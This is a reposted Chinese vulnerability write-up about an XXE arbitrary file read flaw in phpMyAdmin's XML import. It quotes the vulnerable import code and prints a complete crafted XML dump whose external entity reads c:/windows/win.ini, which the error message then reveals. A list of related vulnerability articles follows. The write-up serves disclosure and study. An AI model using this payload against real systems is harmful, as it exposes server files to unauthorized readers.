2. 程式人生 > >PhpMyadmin任意檔案讀取漏洞

PhpMyadmin任意檔案讀取漏洞

阿新 發佈:2018-12-23
 

libraries/import/xml.php中

unset($data);



/**

 * Load the XML string

 *

 * The option LIBXML_COMPACT is specified because it can

 * result in increased performance without the need to

 * alter the code in any way. It's basically a freebee.

 */

$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);

unset($buffer);



/**

 * The XML was malformed

 */

if ($xml === FALSE) {



可以使用系統中的import功能匯入一個精心構造的xml檔案

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE wooyun [

  <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">

]>

<!--

- phpMyAdmin XML Dump

- version 3.4.4

- http://www.phpmyadmin.net

-

- 主機: localhost

- 生成日期: 2011 年 11 月 01 日 14:56

- 伺服器版本: 5.1.28

- PHP 版本: 5.2.6

-->



<pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">

    <!--

    - Structure schemas

    -->

    <pma:structure_schemas>

        <pma:database name="test" collation="utf8_general_ci" charset="utf8">

            <pma:table name="ts_ad">

                &hi80sec;

            </pma:table>

        </pma:database>

    </pma:structure_schemas>



    <!--

    - 資料庫: 'thinksns'

    -->

    <database name="thinksns">

        <!-- 表 ts_ad -->

    </database>

</pma_xml_export>


來讀寫檔案,系統錯誤資訊會直接顯示出檔案內容

相關推薦

PhpMyadmin任意檔案讀取漏洞

  libraries/import/xml.php中 unset($data); /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can

【程式碼審計】大米CMS_V5.5.3 任意檔案讀取漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

24.Windows任意檔案讀取漏洞

漏洞概述: 近日,國外安全研究員SandboxEscaper又一次在推特上公佈了新的Windows 0 day漏洞細節及PoC。這是2018年8月開始該研究員公佈的第三個windows 0 day漏洞。此次披露的漏洞可造成任意檔案讀取。該漏洞可允許低許可權使用者或惡意程式讀取目標Windows主機上任意

WEB安全系列之如何挖掘任意檔案讀取漏洞

$fp="../template/".$siteskin."/area_show.htm"; $f = fopen($fp,'r'); $strout = fread($f,filesize($fp)); fclose($f); $strout=str_replace("{#siteskin}",$site

應用伺服器glassfish任意檔案讀取漏洞

事情就這樣默默發生了 在2015年的10月3日,一位路人甲同學在烏雲上釋出了一個名為“應用伺服器glassfish存在通用任意檔案讀取漏洞”的漏洞,大致內容如下: 漏洞作者:路人甲 相關廠商:glassfish 漏洞編號:wooyun-2010-0144595 漏洞

PHPMailer命令執行及任意檔案讀取漏洞

  今天在thinkphp官網閒逛,無意下載了一套eduaskcms,查看了一下libs目錄中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜這套CMS只提供了一個郵箱介面,前臺頁面需要單獨自己寫,沒辦法用這套CMS進行復現,這邊也順便

glassfish任意檔案讀取漏洞(4.0/4.1)

相關廠商:glassfish漏洞編號:wooyun-2010-0144595漏洞詳情:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae

【程式碼審計】任意檔案讀取漏洞例項

0x00 前言   大多數網站都提供讀取檔案功能,一般實現過程是,根據引數filename的值,獲得該檔案在網站上的絕對路徑,讀取檔案。   這裡,通過兩個任意檔案讀取漏洞例項去展示漏洞原理、漏洞危害。 0x01 漏洞例項一 環境搭建: XYHCMS官網:http:

Windows任意檔案讀取漏洞

低許可權使用者或惡意程式能夠讀取目標Windows計算機上任何檔案的內容,設想你取得了一個普通許可權,還能幹嗎,用該漏洞作者SandboxEscaper的一句話來說,也許是密碼檔案,我不夠聰明,不知道能幹嗎。 漏洞故事 Twitter別名SandboxEscaper

Jenkins 任意檔案讀取漏洞分析

一、漏洞背景 漏洞編號:CVE-2018-1999002 漏洞等級:高危 Jenkins 7 月 18 日的安全通告修復了多個漏洞,其中 SECURITY-914 是由 Orange (部落格連結:http://blog.orange.tw/)挖出的 Jenkins 未授權任意檔案讀取漏

Apache Solr任意檔案讀取漏洞復現

​ Apache Solr任意檔案讀取漏洞復現 一、簡介 Solr是一個獨立的企業級搜尋應用伺服器,它對外提供類似於Web-service的API介面。使用者可以通過http請求,向搜尋引擎伺服器提交一定格式的XML檔案,生成索引;也可以通過Http Get操作提出查詢請求,並得到XML格式的返回結果。

Weblogic漏洞之弱口令、任意檔案讀取、上傳shell

弱口令 環境啟動後,訪問http://192.168.1.15:7001/console/login/LoginForm.jsp,即為weblogic後臺。 本環境存在弱口令可以直接登入: weblogic [email protected]

烏雲漏洞筆記1-任意檔案讀取

閱讀時間16.01.18 page1-3 敏感欄位 &RealPath= &FilePath= &filepath= &Path= &

12.Weblogic 檔案讀取漏洞復現

利用docker環境模擬了一個真實的weblogic環境,其後臺存在一個弱口令,並且前臺存在任意檔案讀取漏洞。 分別通過這兩種漏洞,模擬對weblogic場景的滲透。 Weblogic版本:10.3.6(11g) Java版本:1.6   弱口令 環境啟動後,訪問 http://192.

【程式碼審計】CLTPHP_v5.5.3後臺任意檔案刪除漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

【程式碼審計】CLTPHP_v5.5.3後臺任意檔案下載漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

【程式碼審計】Cscms_v4.1 任意檔案刪除漏洞例項

  環境搭建: CSCMS :http://www.chshcms.com/ 網站原始碼版本:Cscms_v4.1正式版(釋出日期:2017-06-05) 程式原始碼下載:https://github.com/chshcms/cscms   漏洞例項一: 漏洞檔案位

【程式碼審計】EasySNS_V1.6 前臺任意檔案下載漏洞分析

  0x00 環境準備 EasySNS官網:http://www.imzaker.com/ 網站原始碼版本:EasySNS極簡社群V1.60 程式原始碼下載:http://es.imzaker.com/index.php/Topic/gview/id/92.html 預設後臺地址:http

【程式碼審計】YzmCMS_PHP_v3.6 任意檔案刪除漏洞分析

  0x00 環境準備 YzmCMS官網:http://www.yzmcms.com/ 程式原始碼下載:http://pan.baidu.com/s/1pKA4u99 測試網站首頁:   0x01 程式碼分析 1、檔案位置: /application/member/contr

【程式碼審計】XIAOCMS_後臺database.php頁面存在任意檔案刪除漏洞

  0x00 環境準備 XIAOCMS官網: http://www.xiaocms.com/ 網站原始碼版本:XiaoCms (釋出時間:2014-12-29) 程式原始碼下載:http://www.xiaocms.com/download/XiaoCms_20141229.zip 測試網